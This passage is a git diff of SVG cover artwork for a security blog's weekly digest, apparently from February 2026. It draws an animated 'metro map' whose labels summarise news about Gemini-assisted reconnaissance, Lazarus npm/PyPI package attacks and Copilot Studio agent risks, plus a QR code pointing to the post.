27h3v1h-3zM24 27h4v1h-4zM29 27h1v1h-1zM32 27h1v1h-1zM1 28h2v1h-2zM4 28h1v1h-1zM6 28h1v1h-1zM8 28h7v1h-7zM16 28h2v1h-2zM20 28h5v1h-5zM26 28h2v1h-2zM29 28h2v1h-2zM32 28h2v1h-2zM35 28h1v1h-1zM39 28h1v1h-1zM3 29h2v1h-2zM7 29h1v1h-1zM10 29h2v1h-2zM13 29h3v1h-3zM17 29h1v1h-1zM19 29h1v1h-1zM21 29h1v1h-1zM25 29h1v1h-1zM28 29h3v1h-3zM34 29h2v1h-2zM37 29h2v1h-2zM40 29h1v1h-1zM0 30h1v1h-1zM4 30h1v1h-1zM6 30h1v1h-1zM8 30h4v1h-4zM14 30h4v1h-4zM19 30h2v1h-2zM22 30h1v1h-1zM25 30h1v1h-1zM32 30h1v1h-1zM35 30h1v1h-1zM38 30h3v1h-3zM3 31h1v1h-1zM8 31h1v1h-1zM12 31h1v1h-1zM14 31h1v1h-1zM16 31h6v1h-6zM24 31h1v1h-1zM26 31h4v1h-4zM31 31h1v1h-1zM33 31h1v1h-1zM36 31h2v1h-2zM0 32h1v1h-1zM2 32h1v1h-1zM4 32h6v1h-6zM19 32h2v1h-2zM25 32h2v1h-2zM32 32h5v1h-5zM38 32h1v1h-1zM40 32h1v1h-1zM8 33h2v1h-2zM12 33h1v1h-1zM14 33h3v1h-3zM18 33h4v1h-4zM24 33h2v1h-2zM27 33h2v1h-2zM30 33h3v1h-3zM36 33h5v1h-5zM0 34h7v1h-7zM11 34h1v1h-1zM13 34h1v1h-1zM15 34h1v1h-1zM17 34h1v1h-1zM19 34h1v1h-1zM25 34h1v1h-1zM28 34h2v1h-2zM32 34h1v1h-1zM34 34h1v1h-1zM36 34h1v1h-1zM38 34h2v1h-2zM0 35h1v1h-1zM6 35h1v1h-1zM8 35h1v1h-1zM10 35h1v1h-1zM16 35h2v1h-2zM19 35h4v1h-4zM24 35h4v1h-4zM30 35h1v1h-1zM32 35h1v1h-1zM36 35h1v1h-1zM38 35h1v1h-1zM40 35h1v1h-1zM0 36h1v1h-1zM2 36h3v1h-3zM6 36h1v1h-1zM9 36h1v1h-1zM11 36h6v1h-6zM19 36h2v1h-2zM22 36h1v1h-1zM25 36h4v1h-4zM32 36h6v1h-6zM39 36h1v1h-1zM0 37h1v1h-1zM2 37h3v1h-3zM6 37h1v1h-1zM8 37h1v1h-1zM10 37h1v1h-1zM12 37h1v1h-1zM15 37h3v1h-3zM19 37h3v1h-3zM28 37h2v1h-2zM31 37h4v1h-4zM36 37h1v1h-1zM39 37h1v1h-1zM0 38h1v1h-1zM2 38h3v1h-3zM6 38h1v1h-1zM9 38h1v1h-1zM11 38h1v1h-1zM14 38h1v1h-1zM20 38h2v1h-2zM23 38h1v1h-1zM25 38h2v1h-2zM28 38h1v1h-1zM30 38h2v1h-2zM36 38h5v1h-5zM0 39h1v1h-1zM6 39h1v1h-1zM9 39h2v1h-2zM12 39h1v1h-1zM14 39h2v1h-2zM18 39h1v1h-1zM21 39h3v1h-3zM25 39h2v1h-2zM28 39h6v1h-6zM35 39h1v1h-1zM39 39h1v1h-1zM0 40h7v1h-7zM8 40h2v1h-2zM11 40h1v1h-1zM13 40h2v1h-2zM16 40h1v1h-1zM19 40h4v1h-4zM24 40h1v1h-1zM29 40h1v1h-1zM31 40h7v1h-7zM39 40h1v1h-1z"/>
+  </g>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
 </svg>

--- a/assets/images/2026-02-13-Tech_Security_Weekly_Digest_AI_Go_Security_Agent.svg
+++ b/assets/images/2026-02-13-Tech_Security_Weekly_Digest_AI_Go_Security_Agent.svg
@@ -1,134 +1,314 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
-  <title>Security Weekly Digest - February 13, 2026</title>
-  <defs>
-    <linearGradient id="bg" x1="0%" y1="0%" x2="100%" y2="100%">
-      <stop offset="0%" stop-color="#0a0e1a"/>
-      <stop offset="60%" stop-color="#0f1628"/>
-      <stop offset="100%" stop-color="#141b2d"/>
-    </linearGradient>
-    <linearGradient id="hg" x1="0%" y1="0%" x2="100%" y2="0%">
-      <stop offset="0%" stop-color="#1e293b"/>
-      <stop offset="100%" stop-color="#0f172a"/>
-    </linearGradient>
-    <filter id="glow" x="-50%" y="-50%" width="200%" height="200%">
-      <feGaussianBlur stdDeviation="18"/>
-    </filter>
-    <marker id="ar" markerWidth="8" markerHeight="8" refX="4" refY="4" orient="auto">
-      <path d="M0,0 L8,4 L0,8 Z" fill="#ef4444" opacity="0.7"/>
-    </marker>
-  </defs>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Weekly metro map: Gemini AI weaponized recon, Lazarus npm PyPI supply chain, Copilot Studio agent risk">
+<title>Gemini AI Recon, Lazarus npm/PyPI Supply Chain, Copilot Studio Agent Risk - 2026.02.13</title>
+<!-- profile: high-quality-cover (L21 Metro Map, research-based, batch1-locked) -->
+<defs>
+  <linearGradient id="bgGrad" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#08101E"/>
+    <stop offset="50%" stop-color="#0B1628"/>
+    <stop offset="100%" stop-color="#0E1A36"/>
+  </linearGradient>
+  <radialGradient id="pulseRed" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FF4D5E" stop-opacity="1"/>
+    <stop offset="60%" stop-color="#E63946" stop-opacity="0.4"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="pulseAmber" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FFC43D" stop-opacity="1"/>
+    <stop offset="60%" stop-color="#FFA107" stop-opacity="0.4"/>
+    <stop offset="100%" stop-color="#FFA107" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="pulseCyan" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#5FD3F3" stop-opacity="1"/>
+    <stop offset="60%" stop-color="#2AA8CE" stop-opacity="0.4"/>
+    <stop offset="100%" stop-color="#2AA8CE" stop-opacity="0"/>
+  </radialGradient>
+  <pattern id="dotGrid" x="0" y="0" width="30" height="30" patternUnits="userSpaceOnUse">
+    <circle cx="15" cy="15" r="0.7" fill="#2E3A66" opacity="0.5"/>
+  </pattern>
+  <filter id="stationShadow" x="-20%" y="-20%" width="140%" height="140%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2"/>
+    <feOffset dx="0" dy="2"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.6"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="120%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1"/>
+    <feOffset dx="1" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.8"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="glowRed" x="-10%" y="-50%" width="120%" height="200%">
+    <feGaussianBlur stdDeviation="3"/>
+  </filter>
+  <filter id="glowAmber" x="-10%" y="-50%" width="120%" height="200%">
+    <feGaussianBlur stdDeviation="3"/>
+  </filter>
+  <filter id="glowCyan" x="-10%" y="-50%" width="120%" height="200%">
+    <feGaussianBlur stdDeviation="3"/>
+  </filter>
+<filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%"><feGaussianBlur in="SourceAlpha" stdDeviation="2.5"/><feOffset dx="1" dy="3"/><feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer><feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge></filter></defs>
 
-  <rect width="1200" height="630" fill="url(#bg)"/>
+<!-- Background -->
+<rect width="1200" height="630" fill="url(#bgGrad)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)"/>
 
-  <!-- Grid -->
-  <g opacity="0.04" stroke="#94a3b8" stroke-width="0.5">
-    <line x1="0" y1="105" x2="1200" y2="105"/><line x1="0" y1="210" x2="1200" y2="210"/>
-    <line x1="0" y1="315" x2="1200" y2="315"/><line x1="0" y1="420" x2="1200" y2="420"/>
-    <line x1="0" y1="525" x2="1200" y2="525"/>
-    <line x1="240" y1="0" x2="240" y2="630"/><line x1="480" y1="0" x2="480" y2="630"/>
-    <line x1="720" y1="0" x2="720" y2="630"/><line x1="960" y1="0" x2="960" y2="630"/>
+<!-- Guide lines (static) -->
+<g opacity="0.10" stroke="#4A6AA0" stroke-width="0.6" fill="none">
+  <line x1="0" y1="150" x2="1200" y2="150"/>
+  <line x1="0" y1="310" x2="1200" y2="310"/>
+  <line x1="0" y1="470" x2="1200" y2="470"/>
+  <line x1="200" y1="0" x2="200" y2="630"/>
+  <line x1="430" y1="0" x2="430" y2="630"/>
+  <line x1="660" y1="0" x2="660" y2="630"/>
+  <line x1="890" y1="0" x2="890" y2="630"/>
+  <line x1="1080" y1="0" x2="1080" y2="630"/>
+</g>
+
+<!-- Header -->
+<g filter="url(#textShadow)">
+  <text x="60" y="55" font-family="Helvetica,Arial,sans-serif" font-size="28" font-weight="800" letter-spacing="1.2" fill="#E9EEF8">WEEKLY SECURITY DIGEST
+    <animate attributeName="fill" values="#E9EEF8;#8FB8FF;#E9EEF8" dur="7s" repeatCount="indefinite"/>
+  </text>
+  <text x="60" y="82" font-family="Helvetica,Arial,sans-serif" font-size="14" font-weight="500" fill="#8FA4CC" letter-spacing="0.8">AI Weaponization  |  Supply Chain  |  Agent Risk  |  2026.02.13</text>
+</g>
+
+<!-- Severity legend (top-right) -->
+<g transform="translate(1012,44)" filter="url(#textShadow)">
+  <rect x="-8" y="-30" width="178" height="64" rx="10" fill="#14213E" stroke="#3A4E82" stroke-width="1.2">
+    <animate attributeName="stroke-opacity" values="0.6;1;0.6" dur="4s" repeatCount="indefinite"/>
+  </rect>
+  <circle cx="8" cy="-8" r="5" fill="#E63946"/>
+  <text x="22" y="-3" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="700" fill="#E9EEF8">CRITICAL</text>
+  <circle cx="92" cy="-8" r="5" fill="#FFA107"/>
+  <text x="106" y="-3" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="700" fill="#E9EEF8">HIGH</text>
+  <circle cx="8" cy="18" r="4" fill="#2AA8CE"/>
+  <text x="22" y="23" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="700" fill="#E9EEF8">MEDIUM</text>
+</g>
+
+<!-- ===== LINE 1: Gemini AI Weaponization (RED) y=170 ===== -->
+<!-- Glow + track -->
+<line x1="120" y1="170" x2="1090" y2="170" stroke="#E63946" stroke-width="18" stroke-linecap="round" opacity="0.22" filter="url(#glowRed)">
+  <animate attributeName="opacity" values="0.16;0.35;0.16" dur="3s" repeatCount="indefinite"/>
+</line>
+<line x1="120" y1="170" x2="1090" y2="170" stroke="#E63946" stroke-width="9" stroke-linecap="round"/>
+<!-- L1 badge -->
+<g transform="translate(60,170)" filter="url(#textShadow)">
+  <rect x="-8" y="-16" width="60" height="32" rx="6" fill="#E63946">
+    <animate attributeName="fill" values="#E63946;#FF6B7A;#E63946" dur="4s" repeatCount="indefinite"/>
+  </rect>
+  <text x="22" y="6" font-family="Helvetica,Arial,sans-serif" font-size="18" font-weight="900" fill="#FFF" text-anchor="middle">L1</text>
+</g>
+<!-- Traveler L1 -->
+<circle r="9" fill="#FFD6D9" stroke="#FFF" stroke-width="2">
+  <animate attributeName="cx" values="120;1080;120" dur="9s" repeatCount="indefinite"/>
+  <animate attributeName="cy" values="170;170;170" dur="9s" repeatCount="indefinite"/>
+  <animate attributeName="opacity" values="0;1;1;0" dur="9s" repeatCount="indefinite"/>
+</circle>
+<!-- Station A: UNC2970 (lead) -->
+<g transform="translate(200,170)">
+  <circle r="22" fill="url(#pulseRed)">
+    <animate attributeName="r" values="22;32;22" dur="2.8s" repeatCount="indefinite"/>
+  </circle>
+  <circle r="12" fill="#08101E" stroke="#E63946" stroke-width="4" filter="url(#stationShadow)"/>
+</g>
+<g filter="url(#textShadow)">
+  <text x="200" y="136" font-family="Helvetica,Arial,sans-serif" font-size="16" font-weight="800" fill="#FFF" text-anchor="middle">UNC2970</text>
+  <text x="200" y="210" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="600" fill="#FFB8BE" text-anchor="middle">NK-backed APT</text>
+</g>
+<!-- Station B: Gemini AI -->
+<g transform="translate(430,170)">
+  <circle r="14" fill="#08101E" stroke="#E63946" stroke-width="4" filter="url(#stationShadow)"/>
+  <circle r="5" fill="#FF4D5E"/>
+</g>
+<g filter="url(#textShadow)">
+  <text x="430" y="136" font-family="Helvetica,Arial,sans-serif" font-size="16" font-weight="800" fill="#FFF" text-anchor="middle">Gemini AI</text>
+  <text x="430" y="210" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="600" fill="#FFB8BE" text-anchor="middle">Target recon</text>
+</g>
+<!-- Station C: Spear-phishing -->
+<g transform="translate(660,170)">
+  <rect x="-16" y="-12" width="32" height="24" fill="#08101E" stroke="#E63946" stroke-width="4" filter="url(#stationShadow)">
+    <animate attributeName="stroke-width" values="4;6;4" dur="2.5s" repeatCount="indefinite"/>
+  </rect>
+  <text y="5" text-anchor="middle" font-family="Helvetica,Arial,sans-serif" font-size="11" font-weight="900" fill="#FF4D5E">PHISH</text>
+</g>
+<g filter="url(#textShadow)">
+  <text x="660" y="136" font-family="Helvetica,Arial,sans-serif" font-size="16" font-weight="800" fill="#FFF" text-anchor="middle">Spear-phishing</text>
+  <text x="660" y="210" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="600" fill="#FFB8BE" text-anchor="middle">AI-crafted lure</text>
+</g>
+<!-- Station D: Model extract -->
+<g transform="translate(890,170)">
+  <polygon points="-13,-13 13,-13 0,13" fill="#08101E" stroke="#E63946" stroke-width="4" filter="url(#stationShadow)">
+    <animateTransform attributeName="transform" type="rotate" values="0;360" dur="14s" repeatCount="indefinite"/>
+  </polygon>
+</g>
+<g filter="url(#textShadow)">
+  <text x="890" y="136" font-family="Helvetica,Arial,sans-serif" font-size="16" font-weight="800" fill="#FFF" text-anchor="middle">Model extract</text>
+  <text x="890" y="210" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="600" fill="#FFB8BE" text-anchor="middle">Info-ops</text>
+</g>
+<!-- Terminus L1 -->
+<g transform="translate(1070,170)">
+  <circle r="21" fill="none" stroke="#E63946" stroke-width="3" stroke-dasharray="4 3">
+    <animateTransform attributeName="transform" type="rotate" values="0;360" dur="8s" repeatCount="indefinite"/>
+  </circle>
+  <circle r="13" fill="#E63946" filter="url(#stationShadow)"/>
+  <text y="5" text-anchor="middle" font-family="Helvetica,Arial,sans-serif" font-size="11" font-weight="900" fill="#FFF">ATTACK</text>
+</g>
+<text x="1070" y="136" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="700" fill="#FFD6D9" text-anchor="middle" filter="url(#textShadow)">AI weaponized</text>
+
+<!-- ===== LINE 2: Lazarus Supply Chain (AMBER) y=330 ===== -->
+<line x1="120" y1="330" x2="1090" y2="330" stroke="#FFA107" stroke-width="18" stroke-linecap="round" opacity="0.22" filter="url(#glowAmber)">
+  <animate attributeName="opacity" values="0.16;0.35;0.16" dur="3s" repeatCount="indefinite" begin="0.7s"/>
+</line>
+<line x1="120" y1="330" x2="1090" y2="330" stroke="#FFA107" stroke-width="9" stroke-linecap="round"/>
+<!-- L2 badge -->
+<g transform="translate(60,330)" filter="url(#textShadow)">
+  <rect x="-8" y="-16" width="60" height="32" rx="6" fill="#FFA107">
+    <animate attributeName="fill" values="#FFA107;#FFC43D;#FFA107" dur="4s" repeatCount="indefinite"/>
+  </rect>
+  <text x="22" y="6" font-family="Helvetica,Arial,sans-serif" font-size="18" font-weight="900" fill="#1A1202" text-anchor="middle">L2</text>
+</g>
+<!-- Traveler L2 -->
+<circle r="9" fill="#FFF0C9" stroke="#FFF" stroke-width="2">
+  <animate attributeName="cx" values="120;1080;120" dur="10s" repeatCount="indefinite"/>
+  <animate attributeName="cy" values="330;330;330" dur="10s" repeatCount="indefinite"/>
+  <animate attributeName="opacity" values="0;1;1;0" dur="10s" repeatCount="indefinite"/>
+</circle>
+<!-- Station A: Lazarus (lead) -->
+<g transform="translate(200,330)">
+  <circle r="22" fill="url(#pulseAmber)">
+    <animate attributeName="r" values="22;32;22" dur="3.2s" repeatCount="indefinite"/>
+  </circle>
+  <circle r="12" fill="#08101E" stroke="#FFA107" stroke-width="4" filter="url(#stationShadow)"/>
+  <text y="5" text-anchor="middle" font-family="Helvetica,Arial,sans-serif" font-size="10" font-weight="900" fill="#FFC43D">LZRS</text>
+</g>
+<g filter="url(#textShadow)">
+  <text x="200" y="296" font-family="Helvetica,Arial,sans-serif" font-size="16" font-weight="800" fill="#FFF" text-anchor="middle">Lazarus Group</text>
+  <text x="200" y="372" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="600" fill="#FFD27A" text-anchor="middle">NK state actor</text>
+</g>
+<!-- Station B: npm/PyPI -->
+<g transform="translate(430,330)">
+  <circle r="14" fill="#08101E" stroke="#FFA107" stroke-width="4" filter="url(#stationShadow)"/>
+  <circle r="5" fill="#FFC43D"/>
+</g>
+<g filter="url(#textShadow)">
+  <text x="430" y="296" font-family="Helvetica,Arial,sans-serif" font-size="16" font-weight="800" fill="#FFF" text-anchor="middle">npm / PyPI</text>
+  <text x="430" y="372" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="600" fill="#FFD27A" text-anchor="middle">Malicious pkgs</text>
+</g>
+<!-- Station C: Dev workstation -->
+<g transform="translate(660,330)">
+  <rect x="-14" y="-13" width="28" height="26" rx="3" fill="#08101E" stroke="#FFA107" stroke-width="4" filter="url(#stationShadow)">
+    <animate attributeName="stroke-width" values="4;6;4" dur="2.5s" repeatCount="indefinite" begin="0.4s"/>
+  </rect>
+  <text y="5" text-anchor="middle" font-family="Helvetica,Arial,sans-serif" font-size="10" font-weight="900" fill="#FFC43D">DEV</text>
+</g>
+<g filter="url(#textShadow)">
+  <text x="660" y="296" font-family="Helvetica,Arial,sans-serif" font-size="16" font-weight="800" fill="#FFF" text-anchor="middle">Dev workstation</text>
+  <text x="660" y="372" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="600" fill="#FFD27A" text-anchor="middle">Backdoor install</text>
+</g>
+<!-- Station D: Data exfil -->
+<g transform="translate(890,330)">
+  <polygon points="0,-15 13,8 -13,8" fill="#08101E" stroke="#FFA107" stroke-width="4" filter="url(#stationShadow)">
+    <animateTransform attributeName="transform" type="rotate" values="0;360" dur="16s" repeatCount="indefinite"/>
+  </polygon>
+</g>
+<g filter="url(#textShadow)">
+  <text x="890" y="296" font-family="Helvetica,Arial,sans-serif" font-size="16" font-weight="800" fill="#FFF" text-anchor="middle">Data exfil</text>
+  <text x="890" y="372" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="600" fill="#FFD27A" text-anchor="middle">Credentials</text>
+</g>
+<!-- Terminus L2 -->
+<g transform="translate(1070,330)">
+  <circle r="21" fill="none" stroke="#FFA107" stroke-width="3" stroke-dasharray="4 3">
+    <animateTransform attributeName="transform" type="rotate" values="0;-360" dur="9s" repeatCount="indefinite"/>
+  </circle>
+  <circle r="13" fill="#FFA107" filter="url(#stationShadow)"/>
+  <text y="5" text-anchor="middle" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="900" fill="#1A1202">C2</text>
+</g>
+<text x="1070" y="296" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="700" fill="#FFE7B5" text-anchor="middle" filter="url(#textShadow)">Command ctrl</text>
+
+<!-- ===== LINE 3: Copilot Studio Agent Risk (CYAN) y=490 ===== -->
+<line x1="120" y1="490" x2="1090" y2="490" stroke="#2AA8CE" stroke-width="18" stroke-linecap="round" opacity="0.22" filter="url(#glowCyan)">
+  <animate attributeName="opacity" values="0.16;0.35;0.16" dur="3s" repeatCount="indefinite" begin="1.4s"/>
+</line>
+<line x1="120" y1="490" x2="1090" y2="490" stroke="#2AA8CE" stroke-width="9" stroke-linecap="round"/>
+<!-- L3 badge -->
+<g transform="translate(60,490)" filter="url(#textShadow)">
+  <rect x="-8" y="-16" width="60" height="32" rx="6" fill="#2AA8CE">
+    <animate attributeName="fill" values="#2AA8CE;#5FD3F3;#2AA8CE" dur="4s" repeatCount="indefinite"/>
+  </rect>
+  <text x="22" y="6" font-family="Helvetica,Arial,sans-serif" font-size="18" font-weight="900" fill="#061622" text-anchor="middle">L3</text>
+</g>
+<!-- Traveler L3 -->
+<circle r="9" fill="#CFF0FA" stroke="#FFF" stroke-width="2">
+  <animate attributeName="cx" values="120;1080;120" dur="11s" repeatCount="indefinite"/>
+  <animate attributeName="cy" values="490;490;490" dur="11s" repeatCount="indefinite"/>
+  <animate attributeName="opacity" values="0;1;1;0" dur="11s" repeatCount="indefinite"/>
+</circle>
+<!-- Station A: Copilot Studio (lead) -->
+<g transform="translate(200,490)">
+  <circle r="22" fill="url(#pulseCyan)">
+    <animate attributeName="r" values="22;32;22" dur="3s" repeatCount="indefinite"/>
+  </circle>
+  <circle r="12" fill="#08101E" stroke="#2AA8CE" stroke-width="4" filter="url(#stationShadow)"/>
+  <text y="5" text-anchor="middle" font-family="Helvetica,Arial,sans-serif" font-size="9" font-weight="900" fill="#5FD3F3">AGENT</text>
+</g>
+<g filter="url(#textShadow)">
+  <text x="200" y="456" font-family="Helvetica,Arial,sans-serif" font-size="16" font-weight="800" fill="#FFF" text-anchor="middle">Copilot Studio</text>
+  <text x="200" y="532" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="600" fill="#A6E6F7" text-anchor="middle">Agent config</text>
+</g>
+<!-- Station B: Prompt injection -->
+<g transform="translate(430,490)">
+  <circle r="14" fill="#08101E" stroke="#2AA8CE" stroke-width="4" filter="url(#stationShadow)"/>
+  <g stroke="#5FD3F3" stroke-width="2" fill="none">
+    <path d="M-7 0 L7 0"/>
+    <path d="M0 -7 L0 7"/>
   </g>
+</g>
+<g filter="url(#textShadow)">
+  <text x="430" y="456" font-family="Helvetica,Arial,sans-serif" font-size="16" font-weight="800" fill="#FFF" text-anchor="middle">Prompt inject</text>
+  <text x="430" y="532" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="600" fill="#A6E6F7" text-anchor="middle">OWASP Top 10</text>
+</g>
+<!-- Station C: Agent RCE -->
+<g transform="translate(660,490)">
+  <rect x="-18" y="-13" width="36" height="26" rx="4" fill="#08101E" stroke="#2AA8CE" stroke-width="4" filter="url(#stationShadow)">
+    <animate attributeName="stroke-width" values="4;6;4" dur="2.5s" repeatCount="indefinite" begin="0.8s"/>
+  </rect>
+  <text y="5" text-anchor="middle" font-family="Helvetica,Arial,sans-serif" font-size="11" font-weight="900" fill="#5FD3F3">RCE</text>
+</g>
+<g filter="url(#textShadow)">
+  <text x="660" y="456" font-family="Helvetica,Arial,sans-serif" font-size="16" font-weight="800" fill="#FFF" text-anchor="middle">Agent RCE</text>
+  <text x="660" y="532" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="600" fill="#A6E6F7" text-anchor="middle">Plugin abuse</text>
+</g>
+<!-- Station D: Data leak -->
+<g transform="translate(890,490)">
+  <rect x="-14" y="-14" width="28" height="28" fill="#08101E" stroke="#2AA8CE" stroke-width="4" filter="url(#stationShadow)">
+    <animateTransform attributeName="transform" type="rotate" values="0;90;180;270;360" dur="12s" repeatCount="indefinite"/>
+  </rect>
+</g>
+<g filter="url(#textShadow)">
+  <text x="890" y="456" font-family="Helvetica,Arial,sans-serif" font-size="16" font-weight="800" fill="#FFF" text-anchor="middle">Data leak</text>
+  <text x="890" y="532" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="600" fill="#A6E6F7" text-anchor="middle">M365 exfil</text>
+</g>
+<!-- Terminus L3 -->
+<g transform="translate(1070,490)">
+  <circle r="21" fill="none" stroke="#2AA8CE" stroke-width="3" stroke-dasharray="4 3">
+    <animateTransform attributeName="transform" type="rotate" values="0;360" dur="10s" repeatCount="indefinite"/>
+  </circle>
+  <circle r="13" fill="#2AA8CE" filter="url(#stationShadow)"/>
+  <text y="5" text-anchor="middle" font-family="Helvetica,Arial,sans-serif" font-size="9" font-weight="900" fill="#061622">ESCALATE</text>
+</g>
+<text x="1070" y="456" font-family="Helvetica,Arial,sans-serif" font-size="13" font-weight="700" fill="#CFF0FA" text-anchor="middle" filter="url(#textShadow)">Priv escalation</text>
 
-  <!-- Glow orbs -->
-  <circle cx="200" cy="300" r="200" fill="#ef4444" opacity="0.06" filter="url(#glow)"/>
-  <circle cx="600" cy="350" r="180" fill="#f59e0b" opacity="0.05" filter="url(#glow)"/>
-  <circle cx="1000" cy="300" r="180" fill="#3b82f6" opacity="0.06" filter="url(#glow)"/>
+<!-- Footer -->
+<rect x="0" y="596" width="1200" height="34" fill="#0A1830" opacity="0.85"/>
+<text x="60" y="617" font-family="Helvetica,Arial,sans-serif" font-size="12" font-weight="600" fill="#5A7AAA">L1: Gemini AI Recon  |  L2: Lazarus npm/PyPI Campaign  |  L3: Copilot Studio Agent Risk</text>
+<text x="1140" y="617" font-family="Helvetica,Arial,sans-serif" font-size="11" font-weight="500" fill="#3A5070" text-anchor="end">tech.2twodragon.com</text>
 
-  <!-- Header -->
-  <rect x="0" y="0" width="1200" height="80" fill="url(#hg)" opacity="0.9"/>
-  <rect x="0" y="78" width="1200" height="2" fill="#334155" opacity="0.8"/>
-  <g transform="translate(48,40)">
-    <path d="M0,-22 L18,-12 L18,3 C18,13 10,20 0,24 C-10,20 -18,13 -18,3 L-18,-12 Z" fill="#1e3a5f" stroke="#3b82f6" stroke-width="1.5"/>
-    <path d="M-7,1 L-2,6 L8,-5" stroke="#3b82f6" stroke-width="2.5" fill="none" stroke-linecap="round"/>
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/02/13/Tech_Security_Weekly_Digest_AI_Go_Security_Agent/ : 41x41 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(2.048780)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM8 0h2v1h-2zM11 0h4v1h-4zM18 0h3v1h-3zM22 0h1v1h-1zM25 0h1v1h-1zM28 0h1v1h-1zM30 0h3v1h-3zM34 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM8 1h1v1h-1zM15 1h1v1h-1zM17 1h1v1h-1zM21 1h3v1h-3zM25 1h1v1h-1zM29 1h1v1h-1zM34 1h1v1h-1zM40 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM14 2h2v1h-2zM18 2h1v1h-1zM20 2h3v1h-3zM24 2h3v1h-3zM30 2h3v1h-3zM34 2h1v1h-1zM36 2h3v1h-3zM40 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM8 3h3v1h-3zM14 3h3v1h-3zM18 3h1v1h-1zM20 3h3v1h-3zM27 3h3v1h-3zM32 3h1v1h-1zM34 3h1v1h-1zM36 3h3v1h-3zM40 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM9 4h3v1h-3zM14 4h1v1h-1zM16 4h1v1h-1zM18 4h1v1h-1zM23 4h2v1h-2zM26 4h2v1h-2zM29 4h1v1h-1zM31 4h2v1h-2zM34 4h1v1h-1zM36 4h3v1h-3zM40 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM10 5h6v1h-6zM17 5h6v1h-6zM24 5h1v1h-1zM28 5h1v1h-1zM30 5h2v1h-2zM34 5h1v1h-1zM40 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h7v1h-7zM8 7h2v1h-2zM11 7h1v1h-1zM14 7h2v1h-2zM17 7h1v1h-1zM19 7h1v1h-1zM24 7h1v1h-1zM26 7h1v1h-1zM29 7h1v1h-1zM31 7h2v1h-2zM0 8h1v1h-1zM2 8h2v1h-2zM5 8h3v1h-3zM11 8h2v1h-2zM14 8h1v1h-1zM17 8h2v1h-2zM21 8h1v1h-1zM23 8h2v1h-2zM26 8h1v1h-1zM29 8h4v1h-4zM34 8h1v1h-1zM37 8h1v1h-1zM39 8h2v1h-2zM1 9h2v1h-2zM4 9h1v1h-1zM11 9h4v1h-4zM16 9h1v1h-1zM18 9h2v1h-2zM21 9h1v1h-1zM23 9h1v1h-1zM26 9h1v1h-1zM30 9h3v1h-3zM35 9h2v1h-2zM38 9h3v1h-3zM6 10h1v1h-1zM11 10h3v1h-3zM16 10h1v1h-1zM20 10h1v1h-1zM22 10h2v1h-2zM25 10h2v1h-2zM29 10h1v1h-1zM34 10h1v1h-1zM38 10h2v1h-2zM2 11h1v1h-1zM4 11h2v1h-2zM7 11h2v1h-2zM14 11h1v1h-1zM18 11h1v1h-1zM20 11h1v1h-1zM22 11h1v1h-1zM24 11h2v1h-2zM27 11h1v1h-1zM32 11h3v1h-3zM36 11h1v1h-1zM39 11h2v1h-2zM1 12h1v1h-1zM3 12h1v1h-1zM6 12h1v1h-1zM10 12h2v1h-2zM13 12h2v1h-2zM16 